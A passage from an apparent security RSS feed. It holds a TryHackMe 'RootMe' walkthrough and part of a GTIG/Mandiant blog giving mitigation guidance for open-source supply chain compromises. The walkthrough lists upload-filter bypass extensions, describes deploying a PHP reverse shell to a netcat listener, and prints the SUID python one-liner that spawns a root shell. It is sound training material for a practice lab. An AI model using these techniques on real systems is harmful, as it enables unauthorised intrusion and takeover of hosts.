I found an IDOR in Google Classroom on Day 3 of my Hunting?</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe(RootMe)- Write-Up]]></title>
<description><![CDATA[IntroHey everyone! Today we’re solving the TryHackMe room RootMe — a great beginner-friendly box that covers web enumeration, exploiting a file upload vulnerability to get a reverse shell, and then escalating privileges to root using a SUID binary.I’ll walk you through every single step, exactly ...]]></description>
<link>https://tsecurity.de/de/3698176/hacking/tryhackmerootme-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698176/hacking/tryhackmerootme-write-up/</guid>
<pubDate>Mon, 03 Aug 2026 00:09:41 +0200</pubDate>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Sta_Uk105irl1Kg3muJAYw.png"></figure><h3>Intro</h3><p>Hey everyone! Today we’re solving the TryHackMe room <strong>RootMe</strong> — a great beginner-friendly box that covers web enumeration, exploiting a file upload vulnerability to get a reverse shell, and then escalating privileges to root using a SUID binary.</p><p>I’ll walk you through every single step, exactly how I did it, with simple explanations for each command so you actually understand <em>why</em> we’re running it, not just copy-pasting. Let’s go! 😄</p><h3>Task 1 — Deploy the Machine</h3><p>First things first — deploy the machine and connect to the TryHackMe VPN (or just use the AttackBox if you prefer). Once connected, you’ll get assigned a target IP, and that’s what we’ll be attacking throughout this room.</p><p>My target IP was: 10.48.145.206</p><h3>Task 2 — Reconnaissance (Information Gathering)</h3><h3>Nmap Scan</h3><p>The very first thing to do on any box — run an <strong>nmap scan</strong> to see what ports are open and what’s running on them.</p><pre>nmap -sC -sV -T5 10.48.145.206 -oN nmapresult.txt</pre><p><strong>Breaking down the command:</strong></p><ul><li>-sC → Runs Nmap's default <strong>scripting engine</strong> scripts, which gives extra useful details (cookies, headers, sometimes even vulnerabilities).</li><li>-sV → Detects the <strong>version</strong> of whatever service is running on each open port.</li><li>-T5 → Sets the scan <strong>speed</strong> to the fastest (T0 is slowest, T5 is fastest).</li><li>-oN nmapresult.txt → Saves the output to a file so you can refer back to it later.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*rs1mT8bXebWnZ7Wmw3OGPw.png"></figure><p><strong>Result:</strong> Two ports were open:</p><p>Port Service Version 22 SSH OpenSSH 8.2p1 Ubuntu 80 HTTP Apache 2.4.41 (Ubuntu)</p><p>One small but important detail from the -sC scripts — the site was setting a PHPSESSID cookie. That's a dead giveaway that the backend is written in <strong>PHP</strong>, since that's PHP's default session cookie name.</p><blockquote><strong><em>Q: Scan the machine, how many ports are open?</em></strong><em> → </em><strong><em>2</em></strong></blockquote><blockquote><strong><em>Q: What version of Apache is running?</em></strong><em> → </em><strong><em>2.4.41</em></strong></blockquote><blockquote><strong><em>Q: What service is running on port 22?</em></strong><em> → </em><strong><em>SSH</em></strong></blockquote><p><em>(Small confession — I almost skipped noting the PHPSESSID detail the first time, but it ended up being pretty useful later when picking which reverse shell to use. Little details like this matter more than they seem!)</em></p><h3>Gobuster — Finding Hidden Directories</h3><p>Next, let’s find out if there are any hidden pages or folders on the web server using <strong>Gobuster</strong>.</p><pre>gobuster dir -u http://10.48.145.206/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</pre><p><strong>Breaking down the command:</strong></p><ul><li>dir → Tells Gobuster to run in <strong>directory brute-force</strong> mode.</li><li>-u → The target URL.</li><li>-w → Path to the wordlist — a big list of common folder/file names that Gobuster will try one by one.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_aK37B03HRMBX-FQcBdkdw.png"></figure><p><strong>Directories found:</strong></p><ul><li>/uploads</li><li>/css</li><li>/js</li><li>/panel</li><li>/server-status (403 forbidden — no access)</li></ul><blockquote><strong><em>Q: Find directories on the web server using the GoBuster tool.</em></strong><em> → Use the Gobuster command shown above</em></blockquote><blockquote><strong><em>Q: What is the hidden directory?</em></strong><em> → </em><strong><em>/panel</em></strong></blockquote><h3>Task 3 — Getting a Shell</h3><h3>Exploring the Website</h3><p>Time to open these directories in the browser. /css and /js were nothing special (just static assets), but <strong>/panel</strong> had a file upload form.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*m_YawIVewQxbxhpAA-2fmA.png"></figure><p>So the site allows file uploads, and uploaded files land in the /uploads folder.</p><h3>Testing the Upload</h3><p>Before jumping straight to an exploit, I first uploaded a harmless test file (a .png image) just to confirm the upload feature actually worked.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2CU6tpxYSKOjWYBwa8LxNA.png"></figure><p>Upload was successful, and I double-checked by visiting /uploads/ — the file was sitting right there.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/934/1*-AafYvyxJi5dwnzB0WlZkA.png"></figure><p>Now that we know files can be uploaded, the obvious next move is trying to upload something that gives us code execution — since we already know the backend runs PHP.</p><h3>Preparing a PHP Reverse Shell</h3><p>I grabbed a well-known <strong>PHP reverse shell</strong> script (the classic pentestmonkey one — very commonly used in CTFs).</p><p>Only two things need to change in it:</p><ol><li>$ip → Your own attacking machine's IP (where the reverse shell will connect back to (THM IP — TUN0))</li><li>$port → The port you'll be listening on</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/992/1*06NOHrfygJNcrzLzrcwdQw.png"></figure><p>To get your IP:</p><pre>ifconfig</pre><p>If you’re connected through the TryHackMe VPN, make sure you grab the IP from the tun0 interface — not eth0 — since the VPN tunnel is what actually routes traffic to the target machine.</p><h3>First Attempt — Permission Denied</h3><p>I uploaded the shell with a plain .php extension first, and the server immediately rejected it:</p><blockquote><em>“PHP não é permitido!” (PHP is not allowed!)</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*L34EAS-_SuxL1N4CX2WhTg.png"></figure><p>So there’s clearly a server-side filter blocking .php files specifically.</p><h3>Bypassing the Filter</h3><p>A quick search turned up a few common bypass tricks for exactly this situation:</p><ul><li>Change the extension: .php5, .phtml, .pht, .phps</li><li>Double extension trick: image.php.jpg</li><li>Null byte trick: file.php%00.jpg (works on older/outdated servers)</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fvNG5JOFliQSc6PWsSKagA.png"></figure><p>I renamed the file to .php5:</p><pre>mv php-reverse-shell.php php-reverse-shell.php5</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/950/1*XywW0k9yvkNyihudc7jCtw.png"></figure><h3>Upload Successful!</h3><p>This time it went through cleanly — no error, and the message changed to “O arquivo foi upado com sucesso!” (File uploaded successfully!)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V48ZqsRJzTDOR6YIGm69og.png"></figure><p>Checked /uploads/ again and there it was:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/890/1*rO_qHytwKeG7S1h4h2w64A.png"></figure><h3>Setting Up the Listener</h3><p>Before actually triggering the shell, you need a <strong>netcat listener</strong> running on your machine so it can catch the incoming connection the moment the file executes.</p><pre>netcat -knlvp 4444</pre><p><strong>Breaking down the command:</strong></p><ul><li>-k → Keeps the listener alive even after a connection closes (so it can accept another one if needed).</li><li>-n → Skips DNS resolution — since we're expecting a numeric IP, not a hostname, and this also speeds things up.</li><li>-l → Puts netcat into <strong>listen</strong> mode — it just waits for an incoming connection.</li><li>-v → <strong>Verbose</strong> mode, so you see everything happening in detail.</li><li>-p 4444 → The port to listen on (must match the port set inside the PHP shell script).</li></ul><h3>Triggering the Reverse Shell</h3><p>Now open the uploaded file’s URL in the browser: <a href="http://10.48.145.206/uploads/php-reverse-shell.php5">http://10.48.145.206/uploads/php-reverse-shell.php5</a></p><p>The first time I opened it, there was a minor error (something about failing to daemonise) — totally normal, nothing to worry about.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*sYQBHGFkwnm4ss_f_3hHJw.png"><figcaption>This is the error when I not started a listner in my terminal</figcaption></figure><p>Tried again, switched back to the terminal running the listener, and <strong>there it was — a shell!</strong> 🎉</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EI5qdy7RJq1mHqIioKLzMQ.png"></figure><p>Ran whoami and got <strong>www-data</strong> — the low-privilege user that Apache runs as.</p><h3>Finding user.txt</h3><p>Time to grab the user.txt flag:</p><pre>find / -type f -name "user.txt" 2&gt;/dev/null</pre><p><strong>Breaking down the command:</strong></p><ul><li>find / → Search the entire filesystem, starting from root.</li><li>-type f → Only look for <strong>files</strong> (not directories).</li><li>-name "user.txt" → Match files named exactly user.txt.</li><li>2&gt;/dev/null → Silences all error messages (like "Permission denied") so the output stays clean. Here 2 refers to the stderr (error) stream, and /dev/null is basically a black hole — anything sent there just disappears.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/800/1*yeNJX8yMBNvtN_aZf9bgOQ.png"></figure><p>Found it in /var/www/user.txt.<em>✅ </em><strong><em>user.txt captured! 🎉</em></strong></p><h3>Task 4 — Privilege Escalation (Getting to Root)</h3><p>We’re currently www-data, which has limited privileges. To get root, we need to find some privilege escalation path.</p><h3>Hunting for SUID Binaries</h3><p>A <strong>SUID (Set User ID)</strong> bit is a special permission that, when set on an executable, makes it run with the <strong>file owner’s</strong> privileges — no matter who actually runs it. If a SUID binary is owned by root and has some kind of weakness, that’s a golden ticket to becoming root.</p><p>Find all SUID binaries with:</p><pre>find / -perm -4000 2&gt;/dev/null</pre><p><strong>Breaking down the command:</strong></p><ul><li>-perm -4000 → 4000 is the octal value representing the SUID bit, so this finds every file with that bit set.</li><li>2&gt;/dev/null → Same as before, hides error clutter and drop the all error in recyclebin .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/952/1*89siD0RyWpZxU9mrTJ_vHA.png"></figure><p>Most of the list was standard system stuff, but one entry immediately looked <strong>out of place</strong> — /usr/bin/python2.7 had the SUID bit set! Having SUID set on a programming language interpreter like Python is very unusual and almost always a misconfiguration worth exploiting.</p><blockquote><em>✅ </em><strong><em>Q: Search for files with SUID permission, which file is weird?</em></strong><em> → </em><strong><em>python (python2.7)</em></strong></blockquote><h3>Finding the Exploit on GTFOBins</h3><p>Next step — figure out how to actually abuse this. <strong>GTFOBins</strong> (gtfobins.org) is the go-to resource for this — it’s basically a cheat sheet listing exploitation techniques for common Unix binaries.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Vf3NqdKEsuCCChS3VTz2mg.png"></figure><p>Searched “python” on GTFOBins, clicked the <strong>SUID</strong> tab, and found this:</p><pre>python -c 'import os; os.execl("/bin/sh", "sh", "-p")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*SogZeEzlI2rcwEsUONtfbw.png"></figure><p><strong>Breaking down the command:</strong></p><ul><li>import os → Loads Python's os module, which lets us interact with operating system-level operations.</li><li>os.execl("/bin/sh", "sh", "-p") → Replaces the current process with /bin/sh (a shell).</li><li>-p → <strong>Privileged mode</strong> — tells the shell to preserve the current <strong>effective user/group ID</strong>. Since the Python binary is SUID and owned by root, this means the shell it spawns keeps that root-level effective ID too — giving us a <strong>root shell</strong>.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/937/1*eGNyFFZPFbZMGyPEb2rLcA.png"></figure><blockquote><em>⚠️ </em><strong><em>A little slip-up worth mentioning:</em></strong><em> I initially typed </em><em>os.excel() by mistake (typo — should be </em><em>execl, not </em><em>excel), which threw an </em><em>AttributeError. Happens to the best of us — just double-check the method name if you hit this error!</em></blockquote><p>Running the correct command:</p><p>whoami now showed <strong>root</strong>! 🎉</p><blockquote><em>✅ </em><strong><em>Q: Find a form to escalate your privileges.</em></strong><em> → GTFOBins’ Python SUID exploit</em></blockquote><blockquote>Finding root.txt</blockquote><p>Grab the final flag:</p><pre>find / -type f -name "root.txt" 2&gt;/dev/null<br>cat /root/root.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/804/1*TCwAHPJqoXSMnEuV6EgvgA.png"></figure><p>Found in /root/root.txt. 🚩</p><blockquote><em>✅ </em><strong><em>root.txt captured! 🎉</em></strong></blockquote><h3>Conclusion</h3><p>Quick recap of everything we covered in this room:</p><ol><li>Using <strong>Nmap</strong> for basic recon on a target.</li><li>Using <strong>Gobuster</strong> to discover hidden web directories.</li><li>Identifying a file upload vulnerability and <strong>bypassing the extension filter</strong>.</li><li>Deploying a <strong>PHP reverse shell</strong> to get an initial foothold.</li><li>Spotting a <strong>SUID misconfiguration</strong> and using <strong>GTFOBins</strong> to escalate to root.</li></ol><p>RootMe is a great example of how small, individually harmless-looking misconfigurations (a weak upload filter here, a misplaced SUID bit there) can chain together into a full system compromise. This is exactly why every little detail matters during an assessment — even the ones you almost overlook.</p><p>Hope this walkthrough was clear and easy to follow! If you have any questions or feedback, feel free to connect with me on LinkedIn:</p><p>🔗 <a href="https://www.linkedin.com/in/krish-gupta-bb73a72a0/"><strong>Krish Gupta — LinkedIn</strong></a></p><p>Happy Hacking! 🔐</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f5b8bf96f1ba" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/author-krish-gupta-f5b8bf96f1ba">TryHackMe(RootMe)- Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Batten Down Your Packages: Mitigation Guidance for Supply Chain Compromise]]></title>
<description><![CDATA[Written by: Kelli Vanderlee, Stuart Carrera

For years, the cybersecurity industry's understanding of software supply chain compromise has been anchored by a few watershed events, including Russian cyber espionage actor ICE RELIC’s (formerly known as APT29) 2020 compromise of SolarWinds and North...]]></description>
<link>https://tsecurity.de/de/3698002/it-security-nachrichten/batten-down-your-packages-mitigation-guidance-for-supply-chain-compromise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698002/it-security-nachrichten/batten-down-your-packages-mitigation-guidance-for-supply-chain-compromise/</guid>
<pubDate>Mon, 03 Aug 2026 00:08:45 +0200</pubDate>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: <span>Kelli Vanderlee, </span><span>Stuart Carrera</span></p>
<hr></div>
<div class="block-paragraph_advanced"><p><span>For years, the cybersecurity industry's understanding of software supply chain compromise has been anchored by a few watershed events, including </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor"><span>Russian cyber espionage actor ICE RELIC’s (formerly known as APT29) 2020 compromise of SolarWinds</span></a><span> and </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/3cx-software-supply-chain-compromise"><span>North Korean cyber espionage actor UNC4736's 2023 compromise of 3CX</span></a><span>. However, Google Threat Intelligence Group (GTIG) has been tracking growth in threat activity targeting open source software repositories to conduct supply chain compromises over the past several years. A series of large scale open source software supply chain compromise campaigns in 2025 and the first half of 2026 underscore how important it is that organizations implement defensive strategies that directly address this threat vector. </span></p>
<p><span>In this blog post, GTIG and Mandiant discuss trends we have observed in threat actor use of software supply chain compromise, and provide mitigation and hardening recommendations that incorporate insights we have developed as a result of supporting customers through recent campaigns in which threat actors manipulated open source packages. </span></p>
<h3><span>Open Source Supply Chain Compromise Grows in Volume and Impact in 2025 and Early 2026</span></h3>
<p><span>The majority of the most impactful and far-reaching supply chain compromise incidents that GTIG tracked in 2025 and early 2026 involved the compromise of code repositories, software dependencies and developer tools (T1195.001). Open source supply chain compromises offer attackers the same efficiency, scale, and initial stealth as traditional supply chain compromises, but typically require significantly less planning and resources to execute. However, open source supply chain compromises are also noisy once enabled; malicious open source packages are often discovered and publicized much more quickly than traditional supply chain compromises. </span></p>
<p><span>GTIG assesses with high confidence that the growth in very large-scale, open-source supply chain compromise </span><span>campaigns</span><span>, including use of worms and iterative compromises in 2025 and early 2026, represent a significant expansion in use of this tactic compared to prior years. We anticipate that threat actors will emulate the tactics of these campaigns and contribute to growth in open-source supply chain compromise through the rest of 2026 and years to come. GTIG identified several notable supply chain compromises in 2025 and early 2026 that we believe exemplify this trend of exceptionally large campaigns, as measured by size and/or impact (Figure 1). </span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/BattenDownYourPackages_1.max-1000x1000.png" alt="Notable open source supply chain compromises">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vn5dq">Figure 1: Notable open source supply chain compromises, 2025 - early 2026</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>For example from February to May 2026, UNC6780 (aka "TeamPCP") conducted extensive open source supply chain compromises targeting ecosystems like PyPI, npm, and Docker Hub. Initial infection vectors varied across incidents, and included abuse of the </span><code>pull_request_target</code><span> GitHub Actions trigger to obtain base repository secrets and write permissions. The threat actor typically used compromised packages to deploy credential stealers, including SANDCLOCK, to obtain high value secrets. In incident response engagements, we observed UNC6780 attempting to pivot from </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access"><span>compromised artificial intelligence (AI) software</span></a><span> to broader network environments. UNC6780 has monetized stolen credentials through either direct sale of the stolen data, or through partnerships with ransomware and data theft extortion groups. </span></p>
<p><span>In March 2026, GTIG </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package"><span>observed</span></a><span> the introduction of a malicious dependency in the legitimate </span><code>axios</code><span> package. GTIG analysis and the maintainer's </span><a href="https://github.com/axios/axios/issues/10636" rel="noopener" target="_blank"><span>post mortem</span></a><span> indicate that the maintainer account was compromised via social engineering and used to publish the updated versions. We identified the malicious dependency as a dropper that deploys the </span><a href="https://advantage.mandiant.com/malware/malware--804dc049-ef98-568b-b8ee-cc5cf634b52d" rel="noopener" target="_blank"><span>WAVESHAPER.V2</span></a><span> backdoor, and attributes the activity to North Korean actor MIDNIGHT NEPTUNE (formerly known as </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering?e=48754805"><span>UNC1069</span></a><span>). While the malicious versions of axios were removed from the npm registry within three hours of their release, the scope of the compromise is estimated to be broad, as the package has over 100 million weekly downloads. GTIG supported customers in at least 15 industry verticals and 13 different countries affected by this incident. Further, axios is also a dependency for tens of thousands of other packages, and open sources </span><a href="https://socket.dev/blog/axios-npm-package-compromised" rel="noopener" target="_blank"><span>reported</span></a><span> that the malicious axios update had spread to several of these.</span></p>
<h4><span>AI Likely to Accelerate Open Source Supply Chain Compromises</span></h4>
<p><span>GTIG anticipates AI will accelerate the growth of open source software supply chain compromise. Integration of AI into open source software development practices, including "vibe coding," increases attacker opportunities both to manipulate AI functionalities and to take advantage of AI to speed and scale their own operational planning. Open sources have documented </span><a href="https://www.hiddenlayer.com/research/malware-found-in-trending-hugging-face-repository-open-oss-privacy-filter" rel="noopener" target="_blank"><span>multiple</span></a><span> </span><a href="https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html" rel="noopener" target="_blank"><span>instances</span></a><span> of threat actors planting malicious resources on open source AI communities and </span><a href="https://www.koi.ai/blog/postmark-mcp-npm-malicious-backdoor-email-theft" rel="noopener" target="_blank"><span>inserting</span></a><span> malicious code into open source Model Context Protocol (MCP) packages. MCP is a standardized protocol for AI to interact with tools and data. Malicious packages have also tricked AI coding agents, which have unwittingly incorporated them into projects. North Korean threat actors </span><a href="https://www.reversinglabs.com/blog/claude-promptmink-malware-crypto" rel="noopener" target="_blank"><span>reportedly</span></a><span> uploaded malicious cryptocurrency-themed packages, and subsequently an AI coding agent co-authored a commit integrating one of the malicious packages as a dependency to a legitimate cryptocurrency trading project. </span></p>
<h4><span>Thousands of Malicious Open Source Packages Detected</span></h4>
<p><span>Corroborating GTIG's findings, statistics compiled by the Open Source Security Foundation (</span><a href="https://openssf.org/blog/2023/10/12/introducing-openssfs-malicious-packages-repository/" rel="noopener" target="_blank"><span>OpenSSF</span></a><span>), a cross-industry, non-profit collaboration under the Linux Foundation, indicate that the number of malicious open source software packages identified increased exponentially, or 1,444% from 2024 to 2025 (Figure 2).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/BattenDownYourPackages_2.max-1000x1000.png" alt="Count of malicious open source packages">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="vn5dq">Figure 2: Count of malicious open source packages reported 2022–2025 (source: <a href="https://ossf.github.io/malicious-packages/stats/">OpenSSF</a>)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Traditional Supply Chain Compromise Remains Rare</span></h3>
<p><span>In contrast to what we observed in the open source ecosystem, GTIG assesses with high confidence that traditional software supply chain compromise, the manipulation of source code or update/distribution mechanisms (T1195.002), remains rare. The handful of identified cases in 2025 and early 2026 were predominantly cyber espionage incidents with intentionally limited targeting scopes. </span></p>
<p><span>In the most significant case, </span><a href="https://www.fbi.gov/investigate/cyber/alerts/2025/north-korea-responsible-for-1-5-billion-bybit-hack" rel="noopener" target="_blank"><span>North Korean</span></a><span> threat actor UNC4899 </span><a href="https://x.com/safe/status/1897663514975649938?s=20" rel="noopener" target="_blank"><span>reportedly</span></a><span> used social engineering to compromise a developer's machine at a web3 organization. The threat actor </span><a href="https://slowmist.medium.com/bybits-1-5-billion-theft-unveiled-safe-wallet-front-end-code-tampered-84b78f0fa9c2" rel="noopener" target="_blank"><span>used</span></a><span> this access to inject malicious code into the frontend systems, </span><a href="https://www.sygnia.co/blog/sygnia-investigation-bybit-hack/" rel="noopener" target="_blank"><span>specifically</span></a><span> impacting smart contract functionality to alter transactions initiated by a third party organization that utilized the multi-signature wallet with the targeted organization. This compromise was tailored to a single victim, but did not directly touch the targeted organization's infrastructure. The compromise ultimately led to a cryptocurrency theft of assets with an estimated value of $1.4B USD.</span></p>
<p><span>Other examples include the compromise of hosting infrastructure serving updates of </span><a href="https://notepad-plus-plus.org/news/hijacked-incident-info-update/" rel="noopener" target="_blank"><span>Notepad++</span></a><span> from June to December 2025, activity GTIG attributes to UNC6688. GTIG observed organizations in South Korea and France affected by this activity.  GTIG also tracked the early 2026 compromise of </span><a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" rel="noopener" target="_blank"><span>DAEMON Tools installers</span></a><span>. During this campaign, UNC6863 deployed SLICKDEMON to perform broad-spectrum reconnaissance and filter for targets of strategic interest. Following this profiling stage, the group selectively delivered the shellcoded loader BADFALL to facilitate hands-on-keyboard activity and bridge the deployment of the advanced QUIC RAT. The campaign targeted Russia, Brazil, and Turkey, with follow-on exploitation of government and scientific entities in Belarus and Thailand.</span></p>
<p><span>In addition to likely cyber espionage incidents, we observed suspected financially motivated compromises with broader distribution. In two separate incidents threat actors compromised underlying software used in consumer-facing websites: in one case, </span><a href="https://www.securityweek.com/100-car-dealerships-hit-by-supply-chain-attack/" rel="noopener" target="_blank"><span>automotive dealership websites</span></a><span> served ClickFix lures leading to the installation of SHADOWLADDER (aka SectopRAT), and in another, eCommerce websites were </span><a href="https://sansec.io/research/license-backdoor" rel="noopener" target="_blank"><span>infected</span></a><span> with web skimmers.</span></p>
<h3><span>Mitigation Recommendations</span></h3>
<p><span>To effectively mitigate and harden against software supply chain compromises, organizations should adopt a multi-tiered defensive strategy designed to minimize exposure and strengthen resilience against potential compromises.</span></p>
<h4><span>Administrative Oversight and Risk Governance</span></h4>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Cataloging Assets and Dependencies: </strong><span>Maintain a tiered, continuous inventory of all applications, third-party vendors, and services based on operational importance to detect single points of failure and security risks.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Software Bill of Materials (SBOM)</strong><span>: Implement an automated SBOM for all internal and third-party software packages, allowing security teams to continuously monitor and cross-reference active code inventories against newly disclosed vulnerabilities.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Action Bill of Materials (ABOM):</strong><span> Maintain a dedicated ABOM to inventory every third-party pipeline vendor and development utility in use, linking it to your container image inventory to track exactly which external actions are building your production images.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Software Development Lifecycle (SDLC) Threat Modeling and Attack Chain Mapping (Wiz SITF):</strong><span> Align your software supply chain risk management with capabilities such as the </span><a href="https://github.com/wiz-sec-public/SITF" rel="noopener" target="_blank"><span>Wiz SDLC Infrastructure Threat Framework (SITF) </span></a><span>to transition from treating security as a checklist of isolated controls to a holistic threat model. With this freely available framework, organizations can map recent incidents, threat actor campaigns, and red team exercises directly to Wiz SITF Reference IDs indexing each risk to its specific lifecycle stage: Version Control Systems (VCS), continuous integration and continuous delivery (CI/CD) pipelines, package registries, or production infrastructure. This methodology allows security teams to model complex "attack chains" where minor, isolated weaknesses (e.g., a lockfile bypass combined with an overprivileged pipeline token) are chained together by sophisticated threat actors to execute critical, high-impact breaches</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Active Risk Monitoring:</strong><span>  Maintain a dedicated supply chain risk register and a centralized remediation tracker to systematically group development lifecycle (SDLC) threats into clear operational domains: Governance, Identity, Pipeline Logic, and Supply Chain Hygiene. If using Wiz SITF, each vulnerability must be mapped to its exact pipeline stage with a unique Wiz SITF Reference ID. Instead of treating vulnerabilities as isolated bugs, prioritize the blocking of complex "attack chains" (such as a leaked token combined with missing branch protections and overprivileged OIDC trust) that pose the highest breach risk. Ensure each logged item has a designated owner, a targeted completion date, and clear tracking of technical dependencies.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Standardized Configuration &amp; Change Control:</strong><span> Form a Change Advisory Board (CAB) to manage the rollout of all enterprise software and hardware. Ensure every modification includes a pre-deployment risk review, post-deployment monitoring, and a verified plan for recovery or backout.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Staff Security Education:</strong><span> Deploy ongoing training initiatives centered on supply chain hazards, social engineering techniques, and internal procedures for reporting incidents.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Node.js (npm/pnpm):</strong><span> Enforce cooldown controls by using the </span><code>minimumReleaseAge</code><span> configuration. Setting this value to at least 24 hours (1440 minutes) ensures that freshly published, potentially poisoned packages are quarantined until the broader security community has had time to identify and remove them. Ensure that older, unsupported package manager versions (such as legacy Yarn or pnpm versions) are modernized, as they will silently ignore these cooldown boundaries.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Python (pip)</strong><span>: Ensure that Python project environments do not pull dependencies directly from the public PyPI registry, which bypasses internal release-age policies and gating controls. All configurations must specify a secure, vetted private </span><code>--index-url </code><span>in their configuration files to ensure consistent quarantine and vetting of upstream packages.</span></p>
</li>
</ul>
<h4><span>Vendor Lifecycle Management</span></h4>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Vendor Security Vetting:</strong><span> Conduct rigorous due diligence prior to procurement by assessing third-party security frameworks against industry standards such as ISO 27001 or SOC 2.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Cybersecurity Provisions in Contracts:</strong><span> Integrate specific security mandates into vendor agreements, including strict timelines for incident notification, persistent audit rights, and clear liability terms.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Hardware Provenance and Verification:</strong><span> Use supply chain tracing to confirm the integrity of components, establish methods for detecting counterfeit items, and secure the logistics of repairs and replacements.</span></p>
</li>
</ul>
<h4><span>Security Architecture and Engineering Controls</span></h4>
<h5><span>Identity and Access Management</span></h5>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Automated System and Workload Identities</strong><span>: Transition third-party integrations and build-system processes away from static, long-lived administrative Personal Access Tokens (PATs). Instead, mandate the use of dedicated GitHub Apps or short-lived system tokens via federated OpenID Connect (OIDC) for automated machine integrations. This ensures that credentials used by system-to-system workflows expire in a matter of minutes, neutralizing the risk of a persistent compromise if an automation pipeline is breached.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Developer and User Identity Controls (command-line interface (CLI) and Repository Access): </strong><span>Enforce strict access control boundaries for programmatic developer sessions. Because Okta-linked SAML SSO is only capable of verifying identity during the initial creation or authorization of personal tokens and keys, continuous session state cannot be challenged over programmatic CLI connections. Therefore, session security must be enforced through credential expiration and hardware-backed controls.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><strong>Enforce Strict Token Expiration:</strong><span> Strictly limit the allowable lifespan of all personal access tokens (PATs) and programmatic application programming interface (API) keys to a minimum threshold (e.g.a maximum 7-day limit). This guarantees that credentials expire regularly, forcing developers to re-authenticate through the primary SSO gateway.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><strong>Consider Restricting Personal Access Tokens to Neutralize Git-over-HTTPS &amp; Mandate FIDO2 Secure Shell (SSH): </strong><span>To protect developer environments against credential theft, organizations should consider restricting Personal Access Tokens (PATs) globally across GitHub Enterprise Cloud. Because GHEC has no direct protocol-disable switch, administrators should consider disabling classic PATs and enforcing short token lifespans to effectively block unauthorized programmatic HTTPS connections. This protocol containment helps encourage developers to shift entirely to SSH authentication. To secure this transport layer, consider mandating the use of hardware-backed FIDO2 security keys to cryptographically verify physical token possession for all command-line repository actions.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><strong>Isolated CI/CD Execution:</strong><span> Utilize ephemeral runners for build pipelines that are purged immediately after completing a single task. This prevents malicious actors from maintaining a persistent presence between different build phases.</span></p>
</li>
<li aria-level="1">
